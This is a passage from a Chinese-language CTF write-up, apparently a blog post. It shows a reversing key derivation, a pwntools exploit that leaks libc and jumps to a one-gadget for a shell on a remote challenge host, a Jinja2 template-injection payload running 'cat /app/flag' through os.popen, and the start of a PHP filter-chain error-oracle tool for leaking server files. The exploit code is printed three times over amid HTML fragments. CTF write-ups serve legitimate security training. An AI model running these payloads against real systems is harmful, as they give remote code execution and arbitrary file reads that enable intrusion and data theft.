leaf="">}</span><span leaf=""><br></span>
int main_ez_go()
{
// 由z3解出来的EncKey
int key[] = { 108,62,65,98,104,74 };
// 还原EncKey
key[0] ^= 2;
key[2] ^= 2;
key[3] ^= 5;
key[4] ^= 5;
key[5] ^= 2;
for (int i = 0; i < 6; i++)
{
printf("%c", key[i]^0xc);
}
// b2OkaD
return 0;
}

得到Key为b2OkaD。

利用之前得到的Base表，用Cyberchef进行解密即可得到原始输入。

所以运行程序输入oadi即可解密本地的zip.zip得到flag

bypass

exp如下

<span leaf="">from pwn import *</span><span leaf=""><br></span><span leaf="">import time</span><span leaf=""><br></span><span leaf="">import numpy as np</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 定义本地文件路径</span></span><span leaf=""><br></span><span leaf="">local_file = </span><span style="color: #98c379;line-height: 26px;"><span leaf="">'./pwn'</span></span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 加载 ELF 文件</span></span><span leaf=""><br></span><span leaf="">elf = ELF(local_file)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 加载 libc 库文件</span></span><span leaf=""><br></span><span leaf="">libc = ELF(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'./libc.so.6'</span></span><span leaf="">)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 设置日志级别为调试</span></span><span leaf=""><br></span><span leaf="">context.log_level = </span><span style="color: #98c379;line-height: 26px;"><span leaf="">'debug'</span></span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 设置架构</span></span><span leaf=""><br></span><span leaf="">context.arch = elf.arch</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 设置终端</span></span><span leaf=""><br></span><span leaf="">context.terminal = [</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'tmux'</span></span><span leaf="">, </span><span style="color: #98c379;line-height: 26px;"><span leaf="">'neww'</span></span><span leaf="">]</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 定义发送数据函数</span></span><span leaf=""><br></span><span leaf="">def s(data):</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> io.send(data)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 定义在特定分隔符后发送数据函数</span></span><span leaf=""><br></span><span leaf="">def sa(delim, data):</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> io.sendafter(delim, data)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 定义发送一行数据函数</span></span><span leaf=""><br></span><span leaf="">def sl(data):</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> io.sendline(data)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 定义在特定分隔符后发送一行数据函数</span></span><span leaf=""><br></span><span leaf="">def sla(delim, data):</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> io.sendlineafter(delim, data)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 定义接收数据函数</span></span><span leaf=""><br></span><span leaf="">def r(numb=4096):</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> io.recv(numb)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 定义接收数据直到特定分隔符函数</span></span><span leaf=""><br></span><span leaf="">def ru(delims, drop=True):</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> io.recvuntil(delims, drop)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 定义将数据转换为 u32 类型函数</span></span><span leaf=""><br></span><span leaf="">def uu32(data):</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> u32(data.ljust(4, b</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'x00'</span></span><span leaf="">))</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 定义将数据转换为 u64 类型函数</span></span><span leaf=""><br></span><span leaf="">def uu64(data):</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> u64(data.ljust(8, b</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'x00'</span></span><span leaf="">))</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 定义获取补码（64 位）函数</span></span><span leaf=""><br></span><span leaf="">def get_q(data):</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> (~np.uint64(data) + 1)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 定义获取补码（32 位）函数</span></span><span leaf=""><br></span><span leaf="">def get_d(data):</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> (~np.uint32(data) + 1)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 定义获取 system 函数地址和/bin/sh 字符串地址的函数</span></span><span leaf=""><br></span><span leaf="">def get_sh():</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> libc_base + libc.sym[</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'system'</span></span><span leaf="">], libc_base + next(libc.search(b</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'/bin/shx00'</span></span><span leaf="">))</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 定义打印地址信息函数</span></span><span leaf=""><br></span><span leaf="">def info_addr(tag, addr):</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> io.info(tag + </span><span style="color: #98c379;line-height: 26px;"><span leaf="">'==>'</span></span><span leaf=""> +</span><span style="color: #98c379;line-height: 26px;"><span leaf="">': {:#x}'</span></span><span leaf="">.format(addr))</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 定义进入交互模式函数</span></span><span leaf=""><br></span><span leaf="">def itr():</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> io.interactive()</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 连接远程服务器</span></span><span leaf=""><br></span><span leaf="">io = remote(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'47.94.103.168'</span></span><span leaf="">, 20637)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 发送 4 个字节的 2</span></span><span leaf=""><br></span><span leaf="">s(p8(2) * 4)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 接收数据直到'd'</span></span><span leaf=""><br></span><span leaf="">ru(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'d'</span></span><span leaf="">)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 接收数据直到换行符</span></span><span leaf=""><br></span><span leaf="">ru(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'n'</span></span><span leaf="">)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 计算 libc 基地址</span></span><span leaf=""><br></span><span leaf="">libc_base = uu64(r(6)) - libc.sym.puts</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 发送 4 个字节的 0</span></span><span leaf=""><br></span><span leaf="">s(p8(0) * 4)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 定义 one gadget 地址</span></span><span leaf=""><br></span><span leaf="">one = 0x4f302</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 构造并发送数据</span></span><span leaf=""><br></span><span leaf="">s(b</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'KEY: '</span></span><span leaf=""> + b</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'a'</span></span><span leaf=""> * 19 + p8(0x14) + p8(0x2) + b</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'c'</span></span><span leaf=""> * 8 + p64(one + libc_base))</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 等待 0.1 秒</span></span><span leaf=""><br></span><span leaf="">time.sleep(0.1)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 发送数据</span></span><span leaf=""><br></span><span leaf="">s(b</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'VAL: '</span></span><span leaf=""> + b</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'b'</span></span><span leaf=""> * 512)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 进入交互模式</span></span><span leaf=""><br></span><span leaf="">itr()</span><span leaf=""><br></span>
<span leaf="">from pwn import *</span><span leaf=""><br></span><span leaf="">import time</span><span leaf=""><br></span><span leaf="">import numpy as np</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 定义本地文件路径</span></span><span leaf=""><br></span><span leaf="">local_file = </span><span style="color: #98c379;line-height: 26px;"><span leaf="">'./pwn'</span></span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 加载 ELF 文件</span></span><span leaf=""><br></span><span leaf="">elf = ELF(local_file)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 加载 libc 库文件</span></span><span leaf=""><br></span><span leaf="">libc = ELF(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'./libc.so.6'</span></span><span leaf="">)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 设置日志级别为调试</span></span><span leaf=""><br></span><span leaf="">context.log_level = </span><span style="color: #98c379;line-height: 26px;"><span leaf="">'debug'</span></span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 设置架构</span></span><span leaf=""><br></span><span leaf="">context.arch = elf.arch</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 设置终端</span></span><span leaf=""><br></span><span leaf="">context.terminal = [</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'tmux'</span></span><span leaf="">, </span><span style="color: #98c379;line-height: 26px;"><span leaf="">'neww'</span></span><span leaf="">]</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 定义发送数据函数</span></span><span leaf=""><br></span><span leaf="">def s(data):</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> io.send(data)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 定义在特定分隔符后发送数据函数</span></span><span leaf=""><br></span><span leaf="">def sa(delim, data):</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> io.sendafter(delim, data)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 定义发送一行数据函数</span></span><span leaf=""><br></span><span leaf="">def sl(data):</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> io.sendline(data)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 定义在特定分隔符后发送一行数据函数</span></span><span leaf=""><br></span><span leaf="">def sla(delim, data):</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> io.sendlineafter(delim, data)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 定义接收数据函数</span></span><span leaf=""><br></span><span leaf="">def r(numb=4096):</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> io.recv(numb)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 定义接收数据直到特定分隔符函数</span></span><span leaf=""><br></span><span leaf="">def ru(delims, drop=True):</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> io.recvuntil(delims, drop)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 定义将数据转换为 u32 类型函数</span></span><span leaf=""><br></span><span leaf="">def uu32(data):</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> u32(data.ljust(4, b</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'x00'</span></span><span leaf="">))</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 定义将数据转换为 u64 类型函数</span></span><span leaf=""><br></span><span leaf="">def uu64(data):</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> u64(data.ljust(8, b</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'x00'</span></span><span leaf="">))</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 定义获取补码（64 位）函数</span></span><span leaf=""><br></span><span leaf="">def get_q(data):</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> (~np.uint64(data) + 1)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 定义获取补码（32 位）函数</span></span><span leaf=""><br></span><span leaf="">def get_d(data):</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> (~np.uint32(data) + 1)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 定义获取 system 函数地址和/bin/sh 字符串地址的函数</span></span><span leaf=""><br></span><span leaf="">def get_sh():</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> libc_base + libc.sym[</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'system'</span></span><span leaf="">], libc_base + next(libc.search(b</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'/bin/shx00'</span></span><span leaf="">))</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 定义打印地址信息函数</span></span><span leaf=""><br></span><span leaf="">def info_addr(tag, addr):</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> io.info(tag + </span><span style="color: #98c379;line-height: 26px;"><span leaf="">'==>'</span></span><span leaf=""> +</span><span style="color: #98c379;line-height: 26px;"><span leaf="">': {:#x}'</span></span><span leaf="">.format(addr))</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 定义进入交互模式函数</span></span><span leaf=""><br></span><span leaf="">def itr():</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> io.interactive()</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 连接远程服务器</span></span><span leaf=""><br></span><span leaf="">io = remote(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'47.94.103.168'</span></span><span leaf="">, 20637)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 发送 4 个字节的 2</span></span><span leaf=""><br></span><span leaf="">s(p8(2) * 4)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 接收数据直到'd'</span></span><span leaf=""><br></span><span leaf="">ru(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'d'</span></span><span leaf="">)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 接收数据直到换行符</span></span><span leaf=""><br></span><span leaf="">ru(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'n'</span></span><span leaf="">)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 计算 libc 基地址</span></span><span leaf=""><br></span><span leaf="">libc_base = uu64(r(6)) - libc.sym.puts</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 发送 4 个字节的 0</span></span><span leaf=""><br></span><span leaf="">s(p8(0) * 4)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 定义 one gadget 地址</span></span><span leaf=""><br></span><span leaf="">one = 0x4f302</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 构造并发送数据</span></span><span leaf=""><br></span><span leaf="">s(b</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'KEY: '</span></span><span leaf=""> + b</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'a'</span></span><span leaf=""> * 19 + p8(0x14) + p8(0x2) + b</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'c'</span></span><span leaf=""> * 8 + p64(one + libc_base))</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 等待 0.1 秒</span></span><span leaf=""><br></span><span leaf="">time.sleep(0.1)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 发送数据</span></span><span leaf=""><br></span><span leaf="">s(b</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'VAL: '</span></span><span leaf=""> + b</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'b'</span></span><span leaf=""> * 512)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 进入交互模式</span></span><span leaf=""><br></span><span leaf="">itr()</span><span leaf=""><br></span>
from pwn import *
import time
import numpy as np
# 定义本地文件路径
local_file = './pwn'
# 加载 ELF 文件
elf = ELF(local_file)
# 加载 libc 库文件
libc = ELF('./libc.so.6')
# 设置日志级别为调试
context.log_level = 'debug'
# 设置架构
context.arch = elf.arch
# 设置终端
context.terminal = ['tmux', 'neww']
# 定义发送数据函数
def s(data):
return io.send(data)
# 定义在特定分隔符后发送数据函数
def sa(delim, data):
return io.sendafter(delim, data)
# 定义发送一行数据函数
def sl(data):
return io.sendline(data)
# 定义在特定分隔符后发送一行数据函数
def sla(delim, data):
return io.sendlineafter(delim, data)
# 定义接收数据函数
def r(numb=4096):
return io.recv(numb)
# 定义接收数据直到特定分隔符函数
def ru(delims, drop=True):
return io.recvuntil(delims, drop)
# 定义将数据转换为 u32 类型函数
def uu32(data):
return u32(data.ljust(4, b'x00'))
# 定义将数据转换为 u64 类型函数
def uu64(data):
return u64(data.ljust(8, b'x00'))
# 定义获取补码（64 位）函数
def get_q(data):
return (~np.uint64(data) + 1)
# 定义获取补码（32 位）函数
def get_d(data):
return (~np.uint32(data) + 1)
# 定义获取 system 函数地址和/bin/sh 字符串地址的函数
def get_sh():
return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/shx00'))
# 定义打印地址信息函数
def info_addr(tag, addr):
return io.info(tag + '==>' +': {:#x}'.format(addr))
# 定义进入交互模式函数
def itr():
return io.interactive()
# 连接远程服务器
io = remote('47.94.103.168', 20637)
# 发送 4 个字节的 2
s(p8(2) * 4)
# 接收数据直到'd'
ru('d')
# 接收数据直到换行符
ru('n')
# 计算 libc 基地址
libc_base = uu64(r(6)) - libc.sym.puts
# 发送 4 个字节的 0
s(p8(0) * 4)
# 定义 one gadget 地址
one = 0x4f302
# 构造并发送数据
s(b'KEY: ' + b'a' * 19 + p8(0x14) + p8(0x2) + b'c' * 8 + p64(one + libc_base))
# 等待 0.1 秒
time.sleep(0.1)
# 发送数据
s(b'VAL: ' + b'b' * 512)
# 进入交互模式
itr()

easy_flask

<span leaf="">{{ self.__init__.__globals__.__builtins__.__import__(</span><span leaf="">'os'</span><span leaf="">).popen(</span><span leaf="">'cat /app/flag'</span><span leaf="">).</span><span leaf="">read</span><span leaf="">() }}</span><span leaf=""><br></span>
<span leaf="">{{ self.__init__.__globals__.__builtins__.__import__(</span><span leaf="">'os'</span><span leaf="">).popen(</span><span leaf="">'cat /app/flag'</span><span leaf="">).</span><span leaf="">read</span><span leaf="">() }}</span><span leaf=""><br></span>
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat /app/flag').read() }}

输入框输入上面内容即可

ezre

伪随机生成器，但是生成之后数据固定，给比较前下断点，查看 s1 就可以了

<span leaf="">flag{b799eb3a-59ee-4b3b-b49d-39080fc23e99</span><span leaf=""><br></span>
<span leaf="">flag{b799eb3a-59ee-4b3b-b49d-39080fc23e99</span><span leaf=""><br></span>
flag{b799eb3a-59ee-4b3b-b49d-39080fc23e99

file_copy

将下面的脚本上传到了自己的服务器（因为当时设备没有装linux，所以就拿了台服务器将就一下）

<span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf="">#!/usr/bin/env python3</span></span><span leaf=""><br></span><span leaf="">import sys</span><span leaf=""><br></span><span leaf="">import signal</span><span leaf=""><br></span><span leaf="">import argparse</span><span leaf=""><br></span><span leaf="">import json</span><span leaf=""><br></span><span leaf="">from filters_chain_oracle.core.requestor import Requestor</span><span leaf=""><br></span><span leaf="">from filters_chain_oracle.core.verb import Verb</span><span leaf=""><br></span><span leaf="">from filters_chain_oracle.core.bruteforcer import RequestorBruteforcer</span><span leaf=""><br></span><span style="color: #98c379;line-height: 26px;"><span leaf="">""</span></span><span style="color: #98c379;line-height: 26px;"><span leaf="">"</span><span leaf=""><br></span><span leaf="">Class FiltersChainOracle, defines all the CLI logic.</span><span leaf=""><br></span><span leaf="">- useful info -</span><span leaf=""><br></span><span leaf="">This tool is based on the following script : </span><span leaf=""><br></span><span leaf="">https://github.com/DownUnderCTF/Challenges_2022_Public/blob/main/web/minimal</span><span leaf=""><br></span><span leaf="">-php/solve/solution.py</span><span leaf=""><br></span><span leaf="">Each step of this trick is detailed in the following blogpost : </span><span leaf=""><br></span><span leaf="">https://www.synacktiv.com/publications/php-filter-chains-file-read-from-errorbased-oracle</span><span leaf=""><br></span><span leaf="">"</span></span><span style="color: #98c379;line-height: 26px;"><span leaf="">""</span></span><span leaf=""><br></span><span leaf="">class FiltersChainOracle():</span><span leaf=""><br></span><span leaf=""> def __init__(self):</span><span leaf=""><br></span><span leaf=""> self.requestor = None</span><span leaf=""><br></span><span leaf=""> self.bruteforcer = None</span><span leaf=""><br></span><span style="color: #98c379;line-height: 26px;"><span leaf="">""</span></span><span style="color: #98c379;line-height: 26px;"><span leaf="">"</span><span leaf=""><br></span><span leaf=""> Function managing interuption</span><span leaf=""><br></span><span leaf=""> "</span></span><span style="color: #98c379;line-height: 26px;"><span leaf="">""</span></span><span leaf=""><br></span><span leaf=""> def signal_handler(self, sig, frame):</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">print</span></span><span leaf="">(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">"[*] File leak gracefully stopped."</span></span><span leaf="">)</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">print</span></span><span leaf="">(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">"[+] File {} was partially leaked"</span></span><span leaf="">.format(self.requestor.file_to_leak))</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">print</span></span><span leaf="">(self.bruteforcer.base64)</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">print</span></span><span leaf="">(self.bruteforcer.data)</span><span leaf=""><br></span><span style="color: #c678dd;line-height: 26px;"><span leaf="">if</span></span><span leaf=""> self.log_file:</span><span leaf=""><br></span><span leaf=""> self.log_in_file(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">"# The following data was leaked from {} from the </span><span leaf=""><br></span><span leaf="">file {}n{}n"</span></span><span leaf="">.format(self.requestor.target, self.requestor.file_to_leak, </span><span leaf=""><br></span><span leaf="">self.bruteforcer.data.decode(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">"utf-8"</span></span><span leaf="">)))</span><span leaf=""><br></span><span leaf=""> sys.exit(1)</span><span leaf=""><br></span><span leaf=""><br></span><span style="color: #98c379;line-height: 26px;"><span leaf="">""</span></span><span style="color: #98c379;line-height: 26px;"><span leaf="">"</span><span leaf=""><br></span><span leaf=""> Function managing log file</span><span leaf=""><br></span><span leaf=""> "</span></span><span style="color: #98c379;line-height: 26px;"><span leaf="">""</span></span><span leaf=""><br></span><span leaf=""> def log_in_file(self, content):</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">print</span></span><span leaf="">(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">"[*] Info logged in : {}"</span></span><span leaf="">.format(self.log_file))</span><span leaf=""><br></span><span leaf=""> with open(self.log_file, </span><span style="color: #98c379;line-height: 26px;"><span leaf="">"a"</span></span><span leaf="">) as file:</span><span leaf=""><br></span><span leaf=""> file.write(content)</span><span leaf=""><br></span><span leaf=""> file.flush()</span><span leaf=""><br></span><span style="color: #98c379;line-height: 26px;"><span leaf="">""</span></span><span style="color: #98c379;line-height: 26px;"><span leaf="">"</span><span leaf=""><br></span><span leaf=""> Function managing CLI arguments</span><span leaf=""><br></span><span leaf=""> "</span></span><span style="color: #98c379;line-height: 26px;"><span leaf="">""</span></span><span leaf=""><br></span><span leaf=""> def main(self):</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf="">#signal management</span></span><span leaf=""><br></span><span leaf=""> usage = </span><span style="color: #98c379;line-height: 26px;"><span leaf="">""</span></span><span style="color: #98c379;line-height: 26px;"><span leaf="">"</span><span leaf=""><br></span><span leaf=""> Oracle error based file leaker based on PHP filters.</span><span leaf=""><br></span><span leaf=""> Author of the tool : @_remsio_</span><span leaf=""><br></span><span leaf=""> Trick firstly discovered by : @hash_kitten</span><span leaf=""><br></span><span leaf=""> </span><span leaf=""><br></span><span leaf="">~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~</span><span leaf=""><br></span><span leaf=""> $ python3 filters_chain_oracle_exploit.py --target http://127.0.0.1 --file </span><span leaf=""><br></span><span leaf="">'/test' --parameter 0 </span><span leaf=""><br></span><span leaf=""> [*] The following URL is targeted : http://127.0.0.1</span><span leaf=""><br></span><span leaf=""> [*] The following local file is leaked : /test</span><span leaf=""><br></span><span leaf=""> [*] Running POST requests</span><span leaf=""><br></span><span leaf=""> [+] File /test leak is finished!</span><span leaf=""><br></span><span leaf=""> b'SGVsbG8gZnJvbSBTeW5hY2t0aXYncyBibG9ncG9zdCEK'</span><span leaf=""><br></span><span leaf=""> b"</span></span><span leaf="">Hello from Synacktiv</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'s blogpost!\n"</span><span leaf=""><br></span><span leaf=""> """</span><span leaf=""><br></span><span leaf=""> # Parsing command line arguments</span><span leaf=""><br></span><span leaf=""> parser = argparse.ArgumentParser(description=usage, </span><span leaf=""><br></span><span leaf="">formatter_class=argparse.RawTextHelpFormatter)</span><span leaf=""><br></span><span leaf=""> parser.add_argument("--target", help="URL on which you want to run the </span><span leaf=""><br></span><span leaf="">exploit.", required=True)</span><span leaf=""><br></span><span leaf=""> parser.add_argument("--file", help="Path to the file you want to leak.", </span><span leaf=""><br></span><span leaf="">required=True)</span><span leaf=""><br></span><span leaf=""> parser.add_argument("--parameter", help="Parameter to exploit.", </span><span leaf=""><br></span><span leaf="">required=True)</span><span leaf=""><br></span><span leaf=""> parser.add_argument("--data", help="Additionnal data that might be </span><span leaf=""><br></span><span leaf="">required. (ex : {"string":"value"})", required=False)</span><span leaf=""><br></span><span leaf=""> parser.add_argument("--headers", help="Headers used by the request. (ex : </span><span leaf=""><br></span><span leaf="">{"Authorization":"Bearer [TOKEN]"})", required=False)</span><span leaf=""><br></span><span leaf=""> parser.add_argument("--verb", help="HTTP verb to use </span><span leaf=""><br></span><span leaf="">POST(default),GET(~ 135 chars by default),PUT,DELETE", required=False)</span><span leaf=""><br></span><span leaf=""> parser.add_argument("--proxy", help="Proxy you would like to use to run </span><span leaf=""><br></span><span leaf="">the exploit. (ex : http://127.0.0.1:8080)", required=False)</span><span leaf=""><br></span><span leaf=""> parser.add_argument("--in_chain", help="Useful to bypass weak strpos </span><span leaf=""><br></span><span leaf="">configurations, adds the string in the chain. (ex : KEYWORD)", required=False)</span><span leaf=""><br></span><span leaf=""> parser.add_argument("--time_based_attack", help="Exploits the oracle as a </span><span leaf=""><br></span><span leaf="">time base attack, can be improved. (ex : True)", required=False)</span><span leaf=""><br></span><span leaf=""> parser.add_argument("--delay", help="Set the delay in second between </span><span leaf=""><br></span><span leaf="">each request. (ex : 1, 0.1)", required=False)</span><span leaf=""><br></span><span leaf=""> parser.add_argument("--json", help="Send data as JSON (--json=1)", </span><span leaf=""><br></span><span leaf="">required=False)</span><span 